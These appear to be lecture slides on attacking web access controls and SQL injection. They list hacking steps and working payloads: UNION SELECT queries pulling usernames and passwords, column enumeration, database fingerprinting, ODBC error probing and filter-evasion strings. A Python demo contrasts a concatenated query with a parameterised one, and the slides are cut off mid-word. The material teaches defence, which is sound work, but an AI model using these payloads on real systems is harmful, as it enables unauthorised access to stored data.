Attacking Access Controls
- Common vulnerabilities: logic flaws / false assumptions
  - Multistage functionality
    - Example: user accesses the "User Maintenance Menu" and selects "Add User"
    - The page verifies that the user has the privilege to add users
    - It then forwards the user to the "Add User" page
    - But that page is not itself protected
    - An attacker only needs to go directly to this page

Attacking Access Controls
- Common vulnerabilities: use of static files
  - Example: a web publisher interacts with a user to sell / ascertain the right to view a given document
  - Once the user has gained the right to view, the user is given the link
  - This is a static resource that cannot verify the rights again

Attacking Access Controls
- Common vulnerabilities: insecure access control mechanisms
  - Example: use of the Referer header
- Hacking steps:
  - Use site mapping to find / guess hidden resources
  - Use two user accounts of different privilege levels to look for distinguishing parameters
  - Test for the use of the Referer field
  - Review client-side scripts and hidden forms to find references to hidden functionality

Code Injection
- Hacking steps:
  - Supply unexpected syntax to cause problems
  - Identify any anomalies in the application response
  - Examine any error messages
  - Systematically modify the input that causes anomalous behavior, to form and verify hypotheses about the behavior of the system
  - Try safe commands to prove the existence of an injection flaw
  - Exploit the flaw

Code Injection Into SQL
- Gain knowledge of SQL
  - Install the same database as used by the application on a local server to test SQL commands
  - Consult the manuals on error messages
- Detection: cause an error condition
  - String data
    - Submit a single quotation mark
    - Submit two single quotation marks
    - Use SQL concatenation characters:
      - '||'FOO (Oracle)
      - '+'FOO (MSSQL)
      - ' 'FOO (note the space between the quotation marks) (MySQL)
  - Numeric data
    - Replace a numeric value with arithmetic (instead of 5, submit 2+3)
    - Use SQL-specific keywords: 67-ASCII('A') is equivalent to 2 in SQL
    - Beware of characters with special meaning, such as '&', '=', …

Code Injection Into SQL
- Detection: cause an error condition
  - SELECT / INSERT statements
    - The entry point is usually the WHERE clause, but ORDER BY etc. might also be injected
    - Example: admin' or 1=1
    - Example injections into the user name field for injection into an INSERT, where we do not know the number of parameters:
      - foo')
      - foo', 1)--
      - foo', 1, 1)--
      - foo', 1, 1, 1)--
    - Here we rely on 1 being cast into a string.

Code Injection Into SQL
- Union operator
  - SELECT author, title, year FROM books WHERE publisher = 'Wiley'
  - Insert: Wiley' UNION SELECT username, password, uid FROM users
  - to obtain: SELECT author, title, year FROM books WHERE publisher = 'Wiley' UNION SELECT username, password, uid FROM users'
  - Pay attention to error messages in order to reformulate the string more successfully
  - Try:
    - ' UNION SELECT NULL
    - ' UNION SELECT NULL, NULL
    - ' UNION SELECT NULL, NULL, NULL

Code Injection Into SQL
- You can try ORDER BY in order to find out how many columns the query returns:
  - ORDER BY 1
  - ORDER BY 2
  - ORDER BY 3
- Next, find out which columns have a string data type by injecting:
  - UNION SELECT 'a', NULL, NULL
  - UNION SELECT NULL, 'a', NULL
  - UNION SELECT NULL, NULL, 'a'

Code Injection Into SQL
- Fingerprinting the database
  - Important because of differences in the SQL supported
    - E.g.: Oracle SQL requires a FROM clause in all SELECTs
  - Obtain the version string of the database from: UNION SELECT banner, NULL, NULL FROM v$version
  - Use the different ways in which databases concatenate strings:
    - Oracle: 'Tho'||'mas'
    - MSSQL: 'Tho'+'mas'
    - MySQL: 'Tho' 'mas' (with a space between the quotes)
  - Use different numbering formats (each expression evaluates to 0 on its own database and errors on the others):
    - Oracle: BITAND(1,1)-BITAND(1,1)
    - MSSQL: @@PACK_RECEIVED-@@PACK_RECEIVED
    - MySQL: CONNECTION_ID()-CONNECTION_ID()

Code Injection Into SQL
- MSSQL: exploiting ODBC error messages
  - Inject: ' having 1=1
  - Generates the error message:
    Microsoft OLE DB Provider for ODBC Drivers error '80040e14' (Microsoft) [ODBC SQL Server Driver] [SQL Server] Column '' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause

Code Injection Into SQL
- MSSQL: exploiting ODBC error messages
  - Inject: ' group by having 1=1
  - Generates the error message:
    Microsoft OLE DB Provider for ODBC Drivers error '80040e14' (Microsoft) [ODBC SQL Server Driver] [SQL Server] Column '' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause

Code Injection Into SQL
- MSSQL: exploiting ODBC error messages
  - …
  - Inject: ' group by , , , having 1=1
  - Generates no error message
  - Now proceed to inject UNION statements to find the data type of each column
  - Inject: ' union select sum(username) from users

Code Injection Into SQL
- Bypassing filters: avoiding blocked characters
  - The single quotation mark is not required for injection into a numeric data field
  - If the comment character is blocked, craft the injection so that it does not break the surrounding query
    - Instead of: ' or 1 = 1
    - use: ' or 'a' = 'a
  - MSSQL does not need semicolons to separate several commands in a batch

Code Injection Into SQL
- Bypassing filters: circumventing simple validation
  - If a simple blacklist is used, attack canonicalization and validation.
    - E.g., instead of select, try:
      - SeLeCt
      - SELSELECTECT
      - %53%45%4c%45%43%54
      - %2553%2545%254c%2545%2543%2554
  - Use inline comments: SEL/*foo*/ECT (valid in MySQL)
  - Manipulate blocked strings: 'adm'||'in' (valid in Oracle)
  - Use dynamic execution: exec('select * from users') works in MSSQL

Code Injection Into SQL
- Bypas
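As an added example (not part of the original slides), this Python/sqlite3 script shows the string-data detection probe (one quote vs. two quotes) and the comment-free quote-balancing trick from the filter-bypass slide against a query built by string concatenation, next to the parameterised form that a defender should ship instead; the users table, its credentials and the login functions are constructed for the demo.

```python
import sqlite3

def make_db():
    """Constructed demo data (not from the slides): a minimal users table."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (uid INTEGER, username TEXT, password TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?, ?)",
                    [(1, "admin", "s3cret"), (2, "alice", "hunter2")])
    return con

def login_concat(con, username, password):
    """Vulnerable form: input is pasted into the query text, so quotes and
    keywords reach the SQL parser (the behaviour the slides probe for)."""
    sql = ("SELECT uid FROM users WHERE username = '%s' AND password = '%s'"
           % (username, password))
    return [row[0] for row in con.execute(sql)]

def login_param(con, username, password):
    """Hardened form: same query with bound parameters; the values are sent
    separately from the statement text and can never change its structure."""
    sql = "SELECT uid FROM users WHERE username = ? AND password = ?"
    return [row[0] for row in con.execute(sql, (username, password))]

def probe(login, con, value):
    """Submit one test value as the user name and classify the outcome:
    'error' (the SQL broke, i.e. the input reached the parser), 'rows' or 'empty'."""
    try:
        rows = login(con, value, "x")
    except sqlite3.OperationalError:
        return "error"
    return "rows" if rows else "empty"

def detection_report(con):
    """The single-quote / double-quote pair from the detection slide: an
    injectable endpoint errors on ' but not on ''; a parameterised one never errors."""
    return {name: (probe(fn, con, "'"), probe(fn, con, "''"))
            for name, fn in (("concat", login_concat), ("param", login_param))}

if __name__ == "__main__":
    db = make_db()
    print(detection_report(db))
    # admin' or 1=1 on its own breaks the query (the original closing quote is
    # left dangling), which is why the slide balances quotes with ' or 'a'='a.
    print(probe(login_concat, db, "admin' or 1=1"))     # error
    print(probe(login_concat, db, "admin' or 'a'='a"))  # rows (admin's uid)
    print(probe(login_param, db, "admin' or 'a'='a"))   # empty
```

The `'error'` outcome on the concatenated endpoint is exactly the signal the slides tell an attacker to look for, so an application should return a generic error page rather than the database's message, and should be parameterised so the probe never errors in the first place.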